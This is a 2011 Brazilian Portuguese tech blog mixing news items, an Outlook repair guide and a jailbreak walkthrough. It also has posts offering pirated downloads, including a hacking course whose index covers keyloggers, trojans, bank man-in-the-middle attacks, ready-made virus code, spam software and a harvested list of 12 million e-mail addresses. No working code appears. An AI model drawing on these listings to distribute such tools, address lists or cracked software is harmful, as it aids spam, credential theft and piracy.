Pages

segunda-feira, 28 de fevereiro de 2011

1
Problema no sistema do Gmail deletou e-mails de 150 mil usuários

Cerca de 150 mil contas do Gmail foram afetadas por um defeito durante o final de semana. Segundo o Google, menos de 0,08% dos usuários do serviço de e-mail perderam todo o seu conteúdo, como mensagens, anexos e arquivos de conversas no Gtalk.

O problema chamou a atenção do Google quando usuários começaram a encher os fóruns de suporte da empresa com reclamações de e-mails perdidos.

Conforme o site “Mashable”, quando os usuários afetados acessaram o Gmail no domingo (27), eles se deparam com uma página que pedia para que a conta fosse redefinida. Os usuários teriam, inclusive, que definir detalhes apresentados nas boas-vindas, quando é feito o primeiro registro.

Os engenheiros do Google afirmaram que estão trabalhando para restaurar o acesso das contas.
Segundo eles, alguns usuários já tiveram seu acesso normalizado. Os usuários prejudicados ficarão, temporariamente, impossibilitados de acessar a conta. Em mensagens anteriores, os engenheiros afirmaram que, para aquelas usuários que perderam e-mails, o Google está trabalhando para recuperá-los.

0
Reparando arquivos de pastas pessoais .PST

Após muitos amigos me pedirem ajuda com isso pelo msn resolvi postar aqui um jeito pratico de repara os arquivos .pst do outlook.

Se você não consegue abrir o arquivo Pastas Particulares (.pst) ou o arquivo Pasta Offline (.ost) ou suspeitar de que os arquivos de dados .pst ou .ost estão corrompidos, use a ferramenta de Reparo da Caixa de Entrada (Scanpst.exe) para diagnosticar e reparar os erros no arquivo. Essa ferramenta examina somente o arquivo .pst ou .ost e não a caixa de correio no servidor executando o Microsoft Exchange. A ferramenta determina se a estrutura do arquivo está intacta. Se não estiver, a ferramenta de Reparo da Caixa de Entrada redefinirá a estrutura do arquivo e recriará os cabeçalhos.

A ferramenta de Reparo da Caixa de Entrada funciona nos arquivos de dados do Arquivo das Pastas Particulares (.pst) do Microsoft Outlook 97-2002 e do Arquivo de Pastas Particulares (.pst) do Office Outlook no Microsoft Office Outlook 2003 e noMicrosoft Office Outlook 2007.

A ferramenta de Reparo da Caixa de Entrada (Scanpst.exe) é instalada, quando você instala o Outlook. Está localizada em:

unidade:\Program Files\Microsoft Office\OFFICE12.

REPARAR ERROS USANDO A FERRAMENTA DE REPARO DA CAIXA DE ENTRADA (SCANPST.EXE)
Saia do Outlook, se esse programa estiver sendo executado.
Clique duas vezes em Scanpst.exe, localizado em unidade:\Program Files\Microsoft Office\OFFICE12.
Na caixa Digite o nome do arquivo a ser verificado, digite o nome do arquivo .pst ou .ost que você deseja verificar ou clique em Procurar para pesquisar o arquivo.
Para especificar as opções de log de verificação, clique em Opções e depois clique na opção que desejar.
Clique em Iniciar.
Se forem encontrados erros depois que a verificação for concluída, será solicitado que você inicie o processo de reparo para corrigir os erros.
O arquivo de backup será criado durante o processo de reparo. Para alterar o nome ou local padrão deste arquivo de backup, na caixa Digite o nome do arquivo de backup, digite um novo nome ou clique em Procurar para localizar o arquivo que você deseja usar.

Clique em Reparar.
Iniciar o Outlook para usar o perfil que contém o arquivo .pst que você tentou reparar.
No menu Ir, clique em Lista de Pastas.
Na Lista de Pastas, você talvez visualize a pasta denominada Pastas Particulares Recuperadas que contém as pastas padrão do Outlook ou uma pasta Perdidos e Encontrados. As pastas recuperadas normalmente estão vazias, porque são uma reconstrução do arquivo .pst. A pasta Perdidos e Encontrados contém as pastas e os itens recuperados pela ferramenta de Reparo da Caixa de Entrada. Os itens ausentes da pasta Perdidos e Encontrados não puderam ser reparados.

Se você visualizar a pasta Pastas Particulares Recuperadas, crie um novo arquivo .pst e arraste os itens da pasta Perdidos e Encontrados para o novo arquivo .pst. Quando você tiver terminado de mover todos os itens, remova o arquivo Pastas Particulares Recuperadas(.pst), incluindo a pasta Perdidos e Encontrados, a partir do perfil.
OBSERVAÇÕES

Se você conseguir abrir o arquivo .pst original, será possível recuperar os itens adicionais do arquivo .pst danificado.
Por padrão, a ferramenta de Reparo da Caixa de Entrada cria um arquivo denominado nome do arquivo.bak, que é uma cópia do arquivo .pst original com uma outra extensão.
O arquivo .bak está localizado na mesma pasta que o arquivo .pst original. Você pode conseguir recuperar os itens que a ferramenta de Reparo da Caixa de Entrada não conseguiu recuperar a partir do arquivo .bak.
Faça uma cópia do arquivo .bak e forneça um novo nome ao arquivo com a extensão .pst como bak.pst. Importe o arquivo bak.pst e depois mova qualquer item recuperado adicional para o novo arquivo .pst criado.
Uma cópia do arquivo de log será gravada no mesmo local que o arquivo .pst.

Fonte: Microsoft
quinta-feira, 24 de fevereiro de 2011

0
Conheça nossos Serviços



Contrato de Manutenção Preventiva, Assistência Técnica, Suporte de informática, Servidores, Redes de Dados e Internet, Consultoria, Bom Atendimento e Confiabilidade.
Garantimos excelência em cada serviço prestado.

- INTERNET
- FIREWALL
- CONTROLE DE ACESSO
- CONTRATOS DE MANUTENÇÃO
- SEGURANÇA
- VENDA DE EQUIPAMENTOS
- REDES
- SERVIDORES
- SUPORTE TÉCNICO

0
Curso Hacker – Prof. Marco Aurélio Thompsom -10 Módulos [ Ótimo para iniciantes ]

Módulo 1 – Lammer
Esse Módulo é bem básico é mais explicando sobre o conteúdo do Curso mais é bom ter todos os Módulos veja desde o primeiro e preste bastante atenção caso queira ser um Hacker ético um dia.

O CD é em Video Aula com Audio em Português vem os Programas usados e alguns extras.

Conteúdo do Módulo 1 – CD1 de 2

Material de estudo adicional (Arquivos PDF e Texto)

admderedes
Analise de Sistemas
Banco de dados
bancodedados
Comandos UNIX
eBooks do Guia do Hardware
Hardware
Internet
linguagens
Linux
msoffice
Office
Redes
Scripts ASP
Sistemas Operacionais
unices
windows

Media (Video Aulas)

01 – Introdução.avi
02 – Hackeando sem Ferramentas.avi
03 – Google – Segredos.avi
04 – Google – Avatar.avi
05 – Google – Ferramenta de Idiomas.avi
06 – Google – Buscando Imagens.avi
07 – Google – Buscando Serial e e-Mail.avi
08 – Senhas de E-Mail.avi
09 – Comando Ping.avi
10 – Invasão Rápida.avi
11 – Languard com Range.avi
12 – FTP Relâmpago.avi
13 – Fim.avi

Conteúdo do Módulo 1 – CD2 de 2:

Manual do Hacker e Anti-Hacker

Destinado a profissionais da área de Segurança de redes, analistas e técnicos responsáveis por CPD e TI.
Aprenda a proteger seus dados, Conhecendo melhor o mundo HACKER

Capítulos(Videos)

+ Obtendo Senhas
+ trojans
+ Falsificação de Remetentes
+ Vírus
+ Bases de Dados do Mundo Hacker
+ Foralecendo sua segurança

Módulo 2 – Security
Manual do Hacker e Anti-Hacker

Destinado a profissionais da área de Segurança de redes, analistas e técnicos responsáveis por CPD e TI.
Aprenda a proteger seus dados, Conhecendo melhor o mundo HACKER

Conteúdo do CD:

Media (Video Aulas)

Curso_de_Hacker_do_Prof_Marco_Aurlio_Th

Tompson
01 – Introducao.avi
02 – O Hacker saberia.avi
03 – Senha.avi
04 – Serviços OnLine.avi
05 – Anonimo.avi
06 – Antivirus 1.avi
07 – Antivirus 2.avi
08 – Firewall 1.avi
09 – Firewall 2.avi
10 – Navegacao Segura.avi
11 – BackUp.avi
12 – Programas do CD Vermelho.avi
13 – Encerramento.avi

Programas (Usados na Video Aula)

AD-aware 6.0 Build 181 (FREE)
Artigo sobre FIREWALL PESSOAL
AVG Antivírus 6.0.518 (FREE)
Backup Rápido! 2.95 (FREE)
CookieMonsterSetup (FREE)
Disco de Boot Windows 98 SE
Discos de Boot
eTrust EZ Armor Security Suite (AV e firewall) (FREE)
Gerador de Backup 2002 1.0.1 (FREE)
Hide in Picture 2.1 (FREE)
Hotbar Internet Explorer 3.0 (FREE)
Identifica IP (FREE)
Internet Explorer 6 Service Pack 1 (FREE)
Internet Explorer Tweak (FREE)
Justsoft WinPolicy 1.2.23 (FREE)
Kazaa Lite K++ 2.4.3 (FREE)
Máquina Virtual para Linux e Windows
Mensagem falsa do Banco do Brasil
Microsoft Windows Installer 2.0 (FREE)
MV RegClean 3.51 (FREE)
OAdPopUp (FREE)
Ontrack Data Inc. EasyRecovery Profession.09 Multilang (CRACKED)
Password Generator 2.3 (FREE)
PGP 8.0.3 (FREE)
Poledit (FREE)
RegCleaner 4.3.0.780 (FREE)
Spytech CipherWorks (FREE)
Sygate Personal Firewall 5.1 build 1615 (FREE)
System Mechanic 4.0d (CRACKED)
Valhala 1.01 (FREE)
Zone Alarm 4 (CRACKED)

Módulo 3 – Cracker
Conteúdo do CD1:

Media (Video Aulas)
01 – Apresentação Parte 1.avi
02 – Apresentação Parte 2.avi
03 – Usando o CD com Programas.avi
04 – Máquina Virtual.avi
05 – Burlando Proteções Com Teclado.avi
06 – Falsa Proteção.avi
07 – BIOS.avi
08 – Compartilhamento.avi
09 – Flash.avi
10 – Google.avi
11 – Keylogger.avi
12 – Asterisco.avi
13 – Ativacao do Windows.avi
14 – Quebrando PWL.avi
15 – Sniffer.avi
16 – Supervisor de Conteudo.avi
17 – Senhas de Documentos.avi
18 – Wordlist.avi
19 – Cracking.avi
20 – Quebrando Senha de eMail.avi
21 – Burlando Tecladinho Virtual.avi

Conteúdo do CD2:

Programas (Usados na Video Aula)
Base para a captura de teclados virtuais de internet bank
Capturando senhas com scam
Capturar animações em flash
Capturar Senhas com Keyloggers
Capturar senhas com o Google
Capturar Senhas com Sniffers
Crackear Chave de Ativação
Crackear o Windows XP para instalar SP
Crackear serviços HTTP [smtp-pop-http-ftp]
Máquina Virtual
Outros programas e tipos de quebra de senha
Exemplo de alguns:
Enterprise Manager PassView v1.00 (visualiza senha do SQL SERVER)
Coloque senha no seu PC (WinGuard Pro 2004 Free Edition 5.7.1.5)
Palm OS password cracker (FREE)

Módulo 4 – Windows XP
Conteúdo do CD1:

Media (Video Aulas)
Video
ModuloXP.avi

Áudio
Chime2.wav
Chime3.wav
String3.wav

Programas
antiexecomp
antikeylog
avirus
cracking
docs
dos
Essential NetTools 3.2
execomp
exploits
extras
firewall
forensic
foundstone
FTP Explorer
hexa
keylogger
Languard 6
maninmiddle
netbios
oxid
Putty
rastros
rootkit
scanners
SmartWhois 4.0
sniffers
spoof
sysinternals
trojans

Conteúdo do CD2:

Capítulos (Vídeos)
01 – Introdução.avi
02 – FTP Geocities.avi
03 – Localhost.avi
04 – FTP.avi
05 – eMail no BOL para keylogger e trojan.avi
06 – eMail no Yahoo para keylogger e trojan.avi
07 – Buscar informações em grupos.avi
08 – Envio de arquivos grandes.avi
09 – Footprint 1.avi
10 – Footprint 2.avi
11 – IP 1 – Cabeçalho do e-Mail.avi
12 – IP 2 – eMail com AR e Languard.avi
13 – IP 3 – Chat e ICQ.avi
14 – IP 4 – Sniffer.avi
15 – NetTools.avi
16 – Keylogger 1a parte.avi
17 – Keylogger 2a parte.avi
18 – Navegação Shell.avi
19 – Binder.avi
20 – Trojan.avi
21 – Trojan de 3a geraçãoBeast.avi
22 – Man In The Middle 1 – eMail.avi
23 – Man In The Middle 2 – Bancos.avi

Módulo 5 – Hacker
Capítulos(Videos)
01 – Apresentacao_do_Modulo_Hacker.avi

Conteúdo do CD2:

Tutoriais em HTML e DOC

01_Assembly
02_Basic
03_Batch_File_&_Shell_Script
04_BadCOM_BadWin
05_VRML
06_Pascal
07_C_&_C++
08_CygWin
09_HTML_&_CSS
10_WML
11_javascript
12_ASP_VBScript
13_PHP_&_MySQL
14_Java

Conteúdo do CD3:

Tutoriais em HTML, DOC e Video Aulas e Programas

Adobe Reader 6.0.1 Br
WinRAR 3.42 BR
Winzip 9.0 SR-1
15_Visual_Basic
Videoaulas de Visual Basic
Curso de Visual Basic
Apostila de Visual Basic 6.pdf
16_VBA
17_Delphi
18_Registro_do_Windows
19_Gerador_de_Menus
99_Apostilas_de_Banco_de_Dados
99_CGI_&_Perl
99_Clipper
99_Codigos_Maliciosos_Para_Estudo_(PERIGO)
Codigos_de_Trojans
Codigos_de_Virus_Prontos
Codigos_Virus
99_Flash_&_Action_Script
99_Logica_Algoritmo_Programacao_Estrutura_de_Dados
99_Mil_Codigos_Prontos
99_SQL
99_UML
99_XML

Módulo 6 – Scammer
Conteúdo do CD1:

Media (Video Aulas)

Video
Apresentação.avi
Praticas.avi

Conteúdo do CD2:

12 milhoes de eMails

1 milhão e 600 mil juridicas.zip
10 milhões e 900 mil fisicas.zip
eMails.zip
Empresas.zip
Lista – Vip.zip
Listas – Estados.zip

Media (Video Aulas)

Video origem da palavra Spam com o Monty Phyton

Monty Python – versao resumidai.avi
Monty Python -2×12- Spam.avi

Programas do Modulo Scam

BSPlayer 1.22.817
Adobe Acrobat Reader 7 Br
Anawave Websnake 1.2
Extractor
Game – Luxor com crack
K-Lite Codec Pack 2.49 Full, Standard and Basic (FREE)
Microsoft Windows AntiSpyware (Beta)
Power EMail Extractor Pro v3.4 (extrai e-Mails de newsgroups)
Programas para Envio de SPAM
WinRAR 3.42 BR
Winzip 9.0 SR-1

Módulo 7 – Invasão De Servidores Windows
Como Agem Os Hacker Na Invasão De Servidores Windows.

Módulo 8 – Invasão De Servidores Linux
Aprenda como instalar o Linux e como os hackers o utilizam para invadir servidores.

Módulo 9 – Wi-fi
Vídeoaulas do Módulo 9 – Wi-fi Você vai aprender sobre o funcionamento de redes sem fio e como os hackers exploram vulnerabilidades neste tipo de rede.

Módulo 10 – Phreaker
Você vai aprender sobre o funcionamento sistema telefônico e entender como agem os hackers especialistas em telefonia (phreakers).

Nome do livro: Curso Hacker
Nome do Autor: Prof. Marco Aurélio Tompsom
Gênero: Vídeo-Aula
Ano de Lançamento: 2006
Editora: Prof. Marco Aurélio Tompsom

Nº de páginas: 10 Módulos
Tamanho: 7,54 GB
Idioma: Português-Brasil

Download:
Servidor: Hotfile

MÓDULO 1

CD 1 – PARTE 1

CD 1 – PARTE 2

CD 2 – LINK ÚNICO

MÓDULO 2

CD 1 – PARTE 1

CD 1 – PARTE 2

MÓDULO 3

CD 1 – PARTE 1

CD 1 – PARTE 2

CD 2 – PARTE 1

CD 2 – PARTE 2

MÓDULO 4

CD 1 – LINK ÚNICO

CD 2 – PARTE 1

CD 2 – PARTE 1

MÓDULO 5

CD 1 – PARTE 1

CD 1 – PARTE 2

CD 2 – PARTE 1

CD 2 – PARTE 2

CD 3 – PARTE 1

CD 3 – PARTE 2

MÓDULO 6

CD 1 – PARTE 1

CD 1 – PARTE 2

CD 2 – PARTE 1

CD 2 – PARTE 2

MÓDULO 7

CD 1 – PARTE 1

CD 1 – PARTE 2

CD 2 – LINK ÚNICO

MÓDULO 8

CD 1 – LINK ÚNICO

MÓDULO 9

CD 1 – LINK ÚNICO

MÓDULO 10

CD 1 – LINK ÚNICO

Fonte: The Rebels

0
Certified Ethical Hacker v6 Training – Video Aulas [ Não reparem na Tradução grosseira - Google tradutor e froids ]

Se você quiser parar hackers de invadir sua rede, primeiro você tem que invadir suas mentes.
Computadores ao redor do mundo são sistematicamente vítimas de pirataria desenfreada. Este hacker não é só uma, mas está sendo executado tão impecável que o compromisso atacantes sistema, roubar tudo de valor e apagar completamente suas faixas em 20 minutos.

O objetivo do hacker ético é ajudar a organização a tomar medidas preventivas contra ataques maliciosos, atacando o sistema próprio, ao mesmo tempo permanecendo dentro dos limites legais. Esta filosofia tem origem comprovada a prática de tentar pegar um ladrão, pensando como um ladrão. Com o avanço da tecnologia e da organização dependem da tecnologia cada vez mais, os ativos de informação têm evoluído em componentes críticos de sobrevivência.

Se hacking envolve a criatividade eo pensamento "out-of-the-box", em seguida, testes de vulnerabilidade e auditorias de segurança não irá garantir a verificação de segurança de uma organização. Para garantir que as organizações têm uma protecção adequada dos seus activos de informação, eles devem adotar a abordagem de "defesa em profundidade". Em outras palavras, eles devem penetrar em suas redes e avaliar a postura de segurança para vulnerabilidades e exposição.

A definição de um Hacker Ético é muito semelhante a um Teste de Penetração. O Hacker Ético é um indivíduo que é usualmente empregado com a organização e que podem ser confiáveis para realizar uma tentativa de penetrar e redes ou sistemas de computação utilizando os mesmos métodos que um hacker. Hacking é crime nos Estados Unidos e muitos outros países. Quando é feito a pedido e sob um contrato entre um Hacker Ético e de uma organização, é legal. O ponto mais importante é que um Hacker Ético tem autorização para testar o destino.

O programa de CEH certifica indivíduos na disciplina específica da segurança da rede de Ethical Hacking partir de uma perspectiva neutra. A certificação Certified Ethical Hacker vai fortalecer o conhecimento das aplicações dos agentes de segurança, auditores, profissionais da segurança, os administradores de site, e quem está preocupado com a integridade das infra-estruturas de rede. A Certified Ethical Hacker é um profissional capacitado, que entende e sabe como olhar para as fragilidades e vulnerabilidades nos sistemas de destino e utiliza os mesmos conhecimentos e ferramentas que um hacker malicioso.

Para atingir o Certified Ethical Hacker certificação, você deve passar o exame CEH 312-50.

Tamanho: 13 GB
Formato: Rar
Idioma: Inglês
Links para Download:

Servidores:

HotFile

FileSonic

1
Vídeo Aulas Java [ Aproveitem em quanto os arquivos estão disponíveis ]

Autor: Miguel Kojiio
Duração: 23h 58 min
Tamanho: 3.56GB

Video Aula 01 - Introdução
Apresentação das características, objetivos do curso e o conhecimento necessário de JSTL, Hibernate e JSF para desenvolvimento da aplicação.

Duração: 1 h 42 min.
Video Aula 02 - Configuração do Ambiente
Sim, a gente parte do ZERO! Vamos iniciar com a preparação do ambiente para desenvolvimento da aplicação, isto é, instalação de tudo aquilo que será utilizado no decorrer do curso!

Duração: 1 h 13 min.
Video Aula 03 - Preparação do Banco de dados
Após a configuração do ambiente, devemos preparar a nossa base de dados. Nesta aula haverá a exibição da modelagem das tabelas para persistência dos dados. Explicações sobre as tabelas e seus relacionamentos. Criação do Banco de dados e qual a regra de negócio que o nosso sistema para controle de estoque deve implementar.

Duração: 17 min.
Video Aula 04 - Criação, Início do Projeto no Web e bibliotecas
Tudo pronto?! Então podemos começar a codificar! Aqui é mostrado como criar o projeto Web e adicionar as bibliotecas necessárias tanto no Eclipse quanto no Netbeans. Nesta aula mostramos também como migrar o projeto do Eclipse para o Netbeans.

Duração: 33 min.
Video Aula 05 - Configuração Hibernate e Implementação do DAO Genérico
Aqui nós configuramos o Hibernate de forma programática, implementamos a Interface do nosso DAO e, então, codificamos o nosso DAO genérico utilizando o Hibernate!

Duração: 23 min.
Video Aula 06 - Beans e Mapeamento Hibernate Básico
Vamos começar a adicionar um pouco de "mágica" as nossas classes. Nesta aula nós implementamos nossos primeiros beans e efetuamos os mapeamentos objeto relacional utilizando arquivos XML.

Duração: 54 min.
Video Aula 07 - Mapeamento Hibernate Unidirecional de Associações
Sim, o básico nós já fizemos, agora iremos efetuar mapeamentos mais complexos! Iniciamos com associações unidirecionais.

Duração: 25 min.
Video Aula 08 - Mapeamento Hibernate Bidirecional de Associações
Complementando o mapeamento efetuado na aula anterior, nesta aula, nós faremos o mapeamento inverso dos beans! Nosso mapeamento objeto relacional com o hibernate está se tornando mais completo.

Duração: 27 min.
Video Aula 09 - Importando o projeto
Muito bem, a infra-estrutura de persistência está quase pronta, nesta aula iremos mostrar como importar o projeto para o Eclipse e o Netbeans, iremos adicionar as bibliotecas do MyFaces, Tomahawk e Trinidad e ainda efetuar todas as configurações necessárias ao desenvolvimento do nosso sistema de controle de estoque web.

Duração: 45 min.
Video Aula 10 - Mapeamento Hibernate Annotations - Nota Fiscal
Nesta aula efetuamos o mapeamento de mais alguns beans (Código fiscal da operação, Cabeçalho da NF e Detalhe da NF) utilizando as anotações do Hibernate e implementamos também a Query-By-Example no nosso DAO Genérico.

Duração: 44 min.
Video Aula 11 - Implementando a entrada da Nota Fiscal
Utilizar a session-per-operation é mais fácil para aprender, mas não é a melhor abordagem! Nesta aula nós implementamos a session-per-request utilizando o PhaseListener do JSF. Nesta aula nós também iniciamos o desenvolvimento de páginas web com componentes JSF e acrescentamos Validadores e Conversores.

Duração: 3 h 4 min.
Video Aula 12 - Implementando a entrada da Nota Fiscal - Produto
Segunda etapa da implementação da entrada da nota fiscal, aqui nós iremos criar mecanismos para seleção de produtos utilizando dataTable, para nos auxiliar iremos montar mais algumas consultas utilizando a Criteria Query do Hibernate.

Duração: 1 h 44 min.
Video Aula 13 - Implementando a entrada da Nota Fiscal - Nota Fiscal
Para finalizar a nossa nota fiscal devemos registrar as quantidades e valores dos produtos que a compões, nesta aula desenvolveremos estas funcionalidades e ao final incrementaremos o nosso estoque!

Duração: 3 h 2 min.
Video Aula 14 - Hibernate Avançado Performance - Cache
O hibernate permite que o programador tenha uma boa gerência sobre o funcionamento dos caches. Por este motivo, complementamos os estudos deste framework de persistência aprendendo a configurar o cache de primeiro e segundo nível.

Duração: 50 min.
Video Aula 15 - Login com JSF
Em uma aplicação comercial apenas funcionários autenticados podem utilizar o sistema... Nesta aula iremos implementar o login e logout do nosso sistema de controle de estoque, e para isto será desenvolvida uma solução utilizando o nosso PhaseListener.

Duração: 1 h 12 min.
Video Aula 16 - Requisitar baixa do estoque
Quais produtos podem ser baixados no estoque? Como o processo de baixa do estoque é realizado? Nesta aula nós iremos começar a desenvolver a baixa do estoque. Aproveitamos também para aprender a utilizar o atributo binding de alguns componentes JSF e implementar um insert em lote (batch) utilizando o Hibernate.

Duração: 2 h 6 min.
Video Aula 17 - Autorizar baixa do estoque
O funcionário solicitou a baixa do estoque e agora, como efetuar a autorização para baixa? Quem pode autorizar? Nesta aula nós desenvolveremos estes mecanismos aproveitando o login desenvolvido anteriormente.

Duração: 55 min.
Video Aula 18 - Confirmar baixa do estoque
Tudo OK? Então finalmente o funcionário irá efetuar a retirada física dos produtos, neste momento devemos registrar no sistema a baixa do estoque. Vamos colocar nossa infra-estrutura de persistência (Hibernate) para funcionar!

Duração: 43 min.
Video Aula 19 - Ajuste de preços
Que tal desenvolver-mos um mecanismo para efetuar ajustes de preços? Nesta lição nós iremos implementar isto! Por este motivo iremos implementar um mecanismo de consulta mais sofisticado!

Duração: 32 min.
Video Aula 20 - Extra - Logging e Debug JSF
Sim, é importante conhecermos como efetuar o logging e debug de nossa aplicação JSF.

Duração: 45 min.
Video Aula 21 - Extra - Trinidad Ajax - Partial Page Rendering (PPR)
Vamos deixar nossa aplicação mais usável! Nesta aula é mostrado como fazer isto utilizando Ajax! Com Ajax a experiência do nosso usuário será muito mais rica!

Duração: 18 min.
Video Aula 22 - Extra - Paginação com dataTable
Se o nosso estoque possuir muitos produtos devemos criar um mecanismo para listar os produtos em páginas. Nesta aula implementamos um mecanismo de paginação com o Hibernate e JSF!

Duração: 1 h 8 min.
Video Aula 23 - Conclusão
Fim de linha, chegamos ao final do nosso curso.
Duração: 3 min.

Parte1: http://www.megaupload.com/?d=UQ78HSDJ
Parte2: http://www.megaupload.com/?d=WTNMEYBR
parte3: http://www.megaupload.com/?d=GW89SVCT
Parte4: http://www.megaupload.com/?d=BR92HDK7
parte5: http://www.megaupload.com/?d=2LQX2IEB
parte6: http://www.megaupload.com/?d=K65VCEBI
parte7: http://www.megaupload.com/?d=W6X1L9IQ
parte8: http://www.megaupload.com/?d=Z7XRJQWQ
parte9: http://www.megaupload.com/?d=IVQCEGL4
parte10:http://www.megaupload.com/?d=XXXQS6GX
parte11:http://www.megaupload.com/?d=MXKZVRU6
parte12:http://www.megaupload.com/?d=FVRDQA20
parte13:http://www.megaupload.com/?d=B1F8VJJV
parte14:http://www.megaupload.com/?d=LBDMT2FU
parte15:http://www.megaupload.com/?d=B1DXPVTH
parte16:http://www.megaupload.com/?d=7AUWZDYY
parte17:http://www.megaupload.com/?d=0ICXPNL7
parte18:http://www.megaupload.com/?d=7I6BSAWN
parte19:http://www.megaupload.com/?d=XWBV4HQ3
parte20:http://www.megaupload.com/?d=IMI21QX8
parte21:http://www.megaupload.com/?d=8OBBU2WU
parte22:http://www.megaupload.com/?d=ZXXNJMU7
parte23:http://www.megaupload.com/?d=0XH16695
parte24:http://www.megaupload.com/?d=YHCT649E
parte25:http://www.megaupload.com/?d=CECU9XL5
parte26:http://www.megaupload.com/?d=NGER0319
parte27:http://www.megaupload.com/?d=LF7BK6OJ
parte28:http://www.megaupload.com/?d=IN07FG5M
parte29:http://www.megaupload.com/?d=9TVYJ55C
parte30:http://www.megaupload.com/?d=ABL0M016
parte31:http://www.megaupload.com/?d=0I0Q3NGZ
parte32:http://www.megaupload.com/?d=14E052OG
parte33:http://www.megaupload.com/?d=R02QAG4M
parte34:http://www.megaupload.com/?d=UVHF0USO

0
Hackers invadem Twitter da Bovespa

Um hacker inseriu mensagens sobre liberdade de imprensa, Wikileaks e Julian Assange no Twitter oficial da BM&FBovespa, empresa responsável pelo gerenciamento da bolsa de valores de São Paulo.
As postagens começaram por volta das 23h da quarta-feira (23). O invasor se identificou como parte do grupo Anonymous, que ganhou notoriedade após iniciar uma “guerra” em defesa do Wikileaks.

Às 8h30 desta quinta-feira (24), o Twitter da Bovespa divulgou uma mensagem confirmando a invasão: “O perfil oficial da BM&FBOVESPA foi invadido. A Bolsa já acionou o Twitter para providências”.
Em um comunicado divulgado para a imprensa, a Bovespa afirmou que os perfis de redes sociais são mantidos em servidores externos, por isso, não têm relação com a manutenção dos portais oficiais da Bolsa.

"Acrescentamos ainda que episódios como esse vêm ocorrendo com outras empresas e personalidades e que o da Bolsa não é um caso isolado. Esperamos contar com a compreensão dos nossos seguidores e fãs até a situação ser normalizada", dizia a nota.

'TweetButton'

Não se sabe como foi realizado o acesso à conta do Twitter. Todos os tuítes do hacker foram enviados a partir do TweetButton, que já apresentou vulnerabilidades que permitiam a postagem de mensagens não autorizadas. O TweetButton é um recurso do serviço de microblog para que sites incluam um botão que facilita a interação dos usuários com o Twitter a partir de páginas externas.

A primeira mensagem postada pelo hacker aponta para um link com o texto “What is Wikileaks?” (O que é o Wikilekas?). Nas mensagens seguintes, o invasor se identifica como membro do Anonymous. Em uma delas, ele parece cometer um erro de digitação ao escrever “Wikeleaks”.

Todas as mensagens são em inglês. A maioria apenas republica mensagens do site oficial da organização ou do Anonymous. Uma delas fala de um “movimento global contra o mundo financeiro”.

Nesta quinta-feira (24), o juiz britânico Howard Riddle aprovou a extradição do fundador do Wikileaks, Julian Assange, para a Suécia. O país quer a extradição por afirmar que ele é suspeito de quatro crimes sexuais. De acordo com a rede britânica BBC, o juiz comunicou a decisão na corte de Belmarsh Magistrates Court, em Londres.
terça-feira, 22 de fevereiro de 2011

0
Liberando iPhone e outros dispositivos da Apple.

Jailbreak hoje em dia não é apenas uma música sensacional da banda australiana AC/DC. Trata-se também de um processo que garante acesso de leitura e escrita no sistema de arquivos de um iDispositivo (iPhone, iPad, iPod Touch ou AppleTV), o que oferece muitas possibilidades adicionais em relação a um aparelho que não passou por este processo.

Uma das principais é poder utilizar o Cydia , uma "Apple Store Alternativa", onde desenvolvedores que tiveram seus aplicativos rejeitados ou não gostaram, por algum motivo, da política da Apple Store, postam seus aplicativos, o que permite que sejam comprados, baixados e instalados sem nenhum problema, da mesma forma que aplicativos oficiais do serviço da Apple.

Em 2010 o jailbreak foi legalizado pelo governo dos Estados Unidos, que passou a entender que consumidores devem ter permissão para usar e modificar seus dispositivos como quiserem. "Se você comprou, é de sua posse", disse Jennifer Stisa Granick, diretora do Electronic Frontier Foundation (organização sem fins lucrativos que visa proteger os direitos de liberdade de expressão no contexto da era digital).

Abaixo, demonstrarei no método passo a passo como fazer o jailbreak com o auxílio da ferramenta Greenpois0n. Como o programa e suas instruções estão em inglês, tudo o que você deve fazer é decorar qual é o botão sleep e qual é o botão home.

O processo de preparação é bastante simples, bastando seguir os seguintes passos:
Desligue seu aparelho. Se você não sabe como fazer, aperte o botão home e logo em seguida o botão sleep, mantendo-os pressionados até que apareça a barra para desliga-lo. Deslize a barra e aguarde enquanto seu dispositivo é desligado.

Conecte o aparelho ao cabo USB.

Clique, no Greenpois0n, em Prepare to Jailbreak (DFU).

Será iniciada uma contagem de 3 segundos.

Quando ela terminar, pressione o botão sleep e mantenha-o pressionado por 2 segundos.
Sem soltar o botão sleep, aperte também o botão home, mantendo ambos pressionados por 10 segundos.

Solte o botão sleep, mas mantenha o botão home pressionado, por 15 segundos.
Se tudo deu certo até aqui, o sistema exibirá aquela mensagem "instalando driver de dispositivo" e, quando tudo estiver ok, o jailbreak propriamente dito terá início. Caso contrário, aparecerá uma tela com o botão "Try again" (tente novamente) e todo o processo terá que ser repetido. Não esquente: nem sempre é fácil acertar da primeira vez!


Se tudo deu certo, será exibida a tela a seguir. Simplesmente clique em "Jailbreak!".


O dispositivo começará agora a efetivamente interagir com o processo de jailbreak, exibindo na tela diversas instruções em texto, como se fosse um prompt do MS-DOS. Ao término, o dispositivo será reiniciado e a famosa maçã da Apple, que é exibida durante o carregamento do sistema, se tranformará em uma simpática caveirinha.
Quando terminar de carregar, um novo ícone foi adicionado à springboard. Chama-se "Loader". Serve única e exclusivamente para instalar o Cydia. Instale, depois carregue o Loader novamente, vá em"options" e selecione "Remover Loader.app" pois, depois de instalar o Cydia, o Loader não tem mais utilidade nenhuma.
Você finalmente fugiu da cadeia. Aproveite sua liberdade e seja feliz! :)


Fonte: SUPERDOWNLOADS

0
Jogo HACKER EVOLUTION UNTOLD + CRACK + TRADUÇÃO PT-BR

Ta ae pra quem gosta.
Eu particularmente achei muito bem desenvolvido o jogo, vale a pena baixar e testar.

Link: Download

sexta-feira, 18 de fevereiro de 2011

0
Empresa de segurança americana discutia projeto de 'supervírus'

Uma coleção e-mails vazada da empresa de segurança HBGary após invasão do Anonymous revela um projeto de desenvolvimento de um vírus do tipo rootkit – que se camufla no sistema para dar o controle do computador a um invasor. O projeto do vírus, codinome Magenta, foi enviado por um funcionário ao cofundador da HBGary, Greg Hoglund, que o encaminhou à Farallon Research, uma empresa cujo objetivo é “conectar tecnologias comerciais avançadas e as empresas que as constroem com as necessidades do governo dos Estados Unidos”.

Não nos e-mails vazados nenhuma outra informação sobre o futuro da proposta ou se ela foi aceita. O e-mail à Farallon é datado do dia 7 de janeiro de 2011.

